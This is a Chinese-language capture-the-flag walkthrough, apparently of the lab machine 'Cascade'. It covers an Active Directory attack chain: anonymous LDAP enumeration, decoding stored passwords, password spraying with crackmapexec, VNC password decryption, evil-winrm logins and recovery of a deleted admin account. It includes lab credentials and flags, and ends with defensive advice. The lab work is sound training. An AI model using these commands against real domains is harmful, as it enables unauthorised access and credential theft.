Cascade 域渗透测试完整教学文档<\/h1>

1. 信息收集阶段<\/h2>

1.1 初始扫描<\/h3>
使用Nmap进行端口扫描：<\/p>
nmap -p- 10.10.10.182 --min-rate 1000<\/span> -sC -sV -Pn
<\/span><\/span><\/code><\/pre>发现开放端口及服务：<\/p>

53\/tcp: Microsoft DNS (Windows Server 2008 R2 SP1)<\/li>
88\/tcp: Kerberos<\/li>
135\/tcp: MSRPC<\/li>
389\/tcp: LDAP (Active Directory, Domain: cascade.local)<\/li>
445\/tcp: SMB<\/li>
636\/tcp: LDAPS<\/li>
3268\/tcp: LDAP (Global Catalog)<\/li>
3269\/tcp: LDAPS (Global Catalog)<\/li>
5985\/tcp: WinRM (HTTPAPI 2.0)<\/li>
<\/ul>
1.2 SMB枚举<\/h3>
使用enum4linux枚举SMB共享：<\/p>
enum4linux 10.10.10.182
<\/span><\/span><\/code><\/pre>发现用户列表：<\/p>

CascGuest<\/li>
arksvc<\/li>
s.smith<\/li>
r.thompson<\/li>
util<\/li>
j.wakefield<\/li>
s.hickson<\/li>
j.goodhand<\/li>
a.turnbull<\/li>
e.crowe<\/li>
b.hanson<\/li>
d.burman<\/li>
BackupSvc<\/li>
j.allen<\/li>
i.croft<\/li>
<\/ul>
2. LDAP信息收集<\/h2>
2.1 基础LDAP查询<\/h3>
ldapsearch -H ldap:\/\/10.10.10.182 -x -s base namingcontexts
<\/span><\/span><\/code><\/pre>2.2 域内搜索<\/h3>
ldapsearch -H ldap:\/\/10.10.10.182 -x -b "DC=cascade,DC=local"<\/span>
<\/span><\/span><\/code><\/pre>发现关键信息：<\/p>

cascadeLegacyPwd: clk0bjVldmE=<\/code> (base64编码的密码)<\/li>
<\/ul>
解码密码：<\/p>
echo 'clk0bjVldmE='<\/span> | base64 -d
<\/span><\/span># 结果为：rY4n5eva<\/span>
<\/span><\/span><\/code><\/pre>3. SMB凭证测试<\/h2>
使用破解的密码测试SMB访问：<\/p>
crackmapexec smb 10.10.10.182 -u users.txt -p 'rY4n5eva'<\/span>
<\/span><\/span><\/code><\/pre>发现用户r.thompson<\/code>使用此密码有效。<\/p>
3.1 SMB共享枚举<\/h3>
smbmap -H 10.10.10.182 -u r.thompson -p rY4n5eva
<\/span><\/span><\/code><\/pre>发现可访问的共享：<\/p>

Data共享<\/li>
<\/ul>
3.2 下载共享文件<\/h3>
smbclient \/\/10.10.10.182\/data --user 'r.thompson'<\/span>
<\/span><\/span>smb: \><\/span> recurse ON
<\/span><\/span>smb: \><\/span> prompt OFF
<\/span><\/span>smb: \><\/span> mget *
<\/span><\/span><\/code><\/pre>在下载的文件中发现VNC安装配置：<\/p>

IT\/Temp\/s.smith\/VNC Install.reg<\/code><\/li>
包含加密的VNC密码："Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f<\/code><\/li>
<\/ul>
4. VNC密码破解<\/h2>
使用vncpwd工具解密：<\/p>
echo '6bcf2a4b6e5aca0f'<\/span> | xxd -r -p > pass
<\/span><\/span>.\/vncpwd pass
<\/span><\/span># 解密得到密码：sT333ve2<\/span>
<\/span><\/span><\/code><\/pre>5. 初始访问<\/h2>
使用破解的凭证通过WinRM登录：<\/p>
evil-winrm -u s.smith -p sT333ve2 -i 10.10.10.182
<\/span><\/span><\/code><\/pre>获取user flag：<\/p>
38bf2049347ff4746729149bcd08fb87
<\/code><\/pre>
6. 权限提升路径<\/h2>
6.1 用户组分析<\/h3>
net user s.smith
<\/span><\/span># 发现属于以下组：<\/span>
<\/span><\/span># - Audit Share<\/span>
<\/span><\/span># - IT<\/span>
<\/span><\/span># - Remote Management Users<\/span>
<\/span><\/span><\/code><\/pre>6.2 Audit共享分析<\/h3>
访问Audit$共享：<\/p>
smbclient \/\/10.10.10.182\/Audit$ --user 's.smith'<\/span>
<\/span><\/span>smb: \><\/span> mask ""<\/span>
<\/span><\/span>smb: \><\/span> recurse ON
<\/span><\/span>smb: \><\/span> prompt OFF
<\/span><\/span>smb: \><\/span> mget *
<\/span><\/span><\/code><\/pre>发现关键文件：<\/p>

RunAudit.bat<\/code><\/li>
CascAudit.exe<\/code><\/li>
DB<\/code>文件夹<\/li>
<\/ul>
6.3 .NET应用逆向分析<\/h3>
使用dnSpy分析CascAudit.exe：<\/p>

发现应用从SQLite数据库读取加密的LDAP连接凭据<\/li>
解密后连接到LDAP服务器<\/li>
查询被删除的用户<\/li>
将信息插入SQLite数据库的DeletedUserAudit表中<\/li>
<\/ol>
关键解密函数：<\/p>
\/\/ 解密密码为："w3lc0meFr31nd\0\0\0"<\/span>
<\/span><\/span><\/code><\/pre>6.4 使用新凭证<\/h3>
测试新凭证：<\/p>
crackmapexec winrm 10.10.10.182 -u users.txt -p w3lc0meFr31nd --continue-on-success
<\/span><\/span><\/code><\/pre>发现用户arksvc<\/code>使用此密码有效。<\/p>
通过WinRM登录：<\/p>
evil-winrm -u arksvc -p "w3lc0meFr31nd"<\/span> -i 10.10.10.182
<\/span><\/span><\/code><\/pre>7. AD回收站利用<\/h2>
7.1 查询已删除对象<\/h3>
Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"'<\/span> -includeDeletedObjects
<\/span><\/span><\/code><\/pre>发现已删除用户：<\/p>

TempAdmin<\/code><\/li>
<\/ul>
7.2 获取TempAdmin详细信息<\/h3>
Get-ADObject -filter { SAMAccountName -eq<\/span> "TempAdmin"<\/span> } -includeDeletedObjects -property *
<\/span><\/span><\/code><\/pre>发现base64编码的密码：<\/p>
cascadeLegacyPwd: YmFDVDNyMWFOMDBkbGVz
<\/code><\/pre>
解码：<\/p>
echo 'YmFDVDNyMWFOMDBkbGVz'<\/span> | base64 -d
<\/span><\/span># 结果为：baCT3r1aN00dles<\/span>
<\/span><\/span><\/code><\/pre>8. 最终权限提升<\/h2>
使用管理员凭证登录：<\/p>
evil-winrm -u administrator -p baCT3r1aN00dles -i 10.10.10.182
<\/span><\/span><\/code><\/pre>获取root flag：<\/p>
cd061c9640340417ddbb44196ece4305
<\/code><\/pre>
9. 关键知识点总结<\/h2>

LDAP信息泄露<\/strong>：通过匿名LDAP查询获取cascadeLegacyPwd属性<\/li>
密码重用<\/strong>：发现多个用户使用相同密码<\/li>
VNC密码解密<\/strong>：从注册表文件中提取并解密VNC凭证<\/li>
共享审计<\/strong>：通过Audit共享获取.NET应用程序<\/li>
.NET逆向<\/strong>：分析CascAudit.exe获取LDAP凭据<\/li>
AD回收站<\/strong>：查询已删除对象获取TempAdmin账户<\/li>
密码复用<\/strong>：TempAdmin与Administrator密码相同<\/li>
<\/ol>
10. 防御建议<\/h2>

禁用匿名LDAP查询<\/li>
避免在LDAP属性中存储明文或可逆加密的密码<\/li>
实施最小权限原则，限制共享访问<\/li>
定期审计和清理AD回收站<\/li>
避免管理员账户密码复用<\/li>
对包含敏感信息的.NET应用程序进行混淆处理<\/li>
实施凭证隔离，不同服务使用不同凭证<\/li>
<\/ol>